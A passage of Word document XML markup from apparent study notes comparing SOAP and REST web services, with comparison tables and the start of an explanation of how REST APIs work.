          <w:p w14:paraId="6819707F"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otocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32FDAFE0"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s a protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4803BE07" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF6C68A"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mat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C2B6664"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s only XML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4D37D13B" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="529DF91E"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ansport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="116AE74B"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orks over HTTP, SMTP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="73AC31E6" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7162ABFB"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ndards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716CBD6F"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 built-in standards for security, transactions, ACID, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4E2751A7" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30033805"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tract-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0688EE36"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s WSDL (Web Services Description Language) to define contracts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="27757DE2" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55744ACF"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essage Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6966CA8D"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avy – due to XML and extra SOAP envelope tags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="64EDC5B9" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616B07D7"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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62189A8C"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uilt-in standard error handling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10C73462" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00395F6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51A12F">
          <v:rect id="_x0000_i2099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="453155D7" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6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EST (Representational State Transf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4"/>
        <w:gridCol w:w="6399"/>
      </w:tblGrid>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="3EE0F6F0" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B6E277" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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531A9C09" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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395F6D" w:rsidRPr="00CE4B95" w14:paraId="0BBF17A1" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="576E1DB8"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chitecture Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3676EF17"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s an architecture, not a protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="22624319" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CFA3FE6"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mat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67722E2C"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pports JSON, XML, HTML, plain text (JSON preferred).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="189FE488" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB4EC40"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ansport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD828BE"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orks only over HTTP/HTTPS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="1DE49413" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490EF146"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ndards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D4AE94A"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ghtweight, no strict rules; uses HTTP verbs (GET, POST, PUT, DELETE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4B88CBC1" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65116EB9"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tract-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68D19688"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strict contracts (WSDL not used).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="722073E9" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59FD779D"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essage Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BE2AD55"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ght – JSON payloads are smaller.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="43B9FF4F" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620BB059"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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7579262A"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TTP status codes (e.g., 200, 404, 500).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="518462D3" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00395F6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A14716">
          <v:rect id="_x0000_i2100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED00C6C"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Which is more efficient?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7967EB"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REST is generally more efficient for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429496A9" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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eb/mobile apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964A7A3" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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erformance-critical apps (smaller payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057FF4AE" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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calability and ease of use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DA703C" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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teless services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F106A0B" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6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OAP is better for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0DCF9" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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terprise-level apps needing robust security, ACID transactions, or asynchronous messaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA000C" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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anking, Telecom, Payment Gateway integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641079B0" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00395F6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C310DFA">
          <v:rect id="_x0000_i2101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="022408A1" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDD1B7C" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67195104" w14:textId="3B6BC122" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6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72"/>
        <w:gridCol w:w="2332"/>
        <w:gridCol w:w="2338"/>
      </w:tblGrid>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="273607CC" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5145FEDD" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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parison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="054F3A28" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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REST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B76CA27" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">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OAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="5E5E512F" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED5D77A"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ghtweight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CB85044"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55EC1E96"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="677AB8A2" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="635D591B"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sy to use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F304345"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Simpler &amp; faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4991551B"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Complex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="61BFF438" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0A1829"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curity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204DB9A8"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Manual (OAuth, JWT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60D836EC"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Built-in (WS-Security)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="77B7E6A0" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C08E52F"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lexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C4CF193"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JSON, XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDC6267"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Only XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="2BB0AB14" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651786D4"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fficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="529C52D9"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="522334E2" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="339FE41A" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00395F6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0F21ABF">
          <v:rect id="_x0000_i2102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A62E0E" w14:textId="2DD30C05" w:rsidR="001A6DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6DBB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="434" w:name="_Toc196307914"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How REST API works?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w14:paraId="508415DE" w14:textId="2260BBA1" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API (Representational State Transfer API)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an architectural style for designing networked applications. It is based on stateless client-server communication and operates over HTTP. REST APIs are widely used for building web services because they are simple, lightweight, and scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7647C960" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How REST API Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B055F03" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1846"/>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Client-Server Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581AC8BC" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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RESTful services follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>client-server</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model where the client sends requests and the server responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693BB8D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1846"/>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The client initiates requests, and the server processes these requests, performs the necessary operations (e.g., accessing a database), and sends a response back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8ECF3D" w14:textId="77777777" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1846"/>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Stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
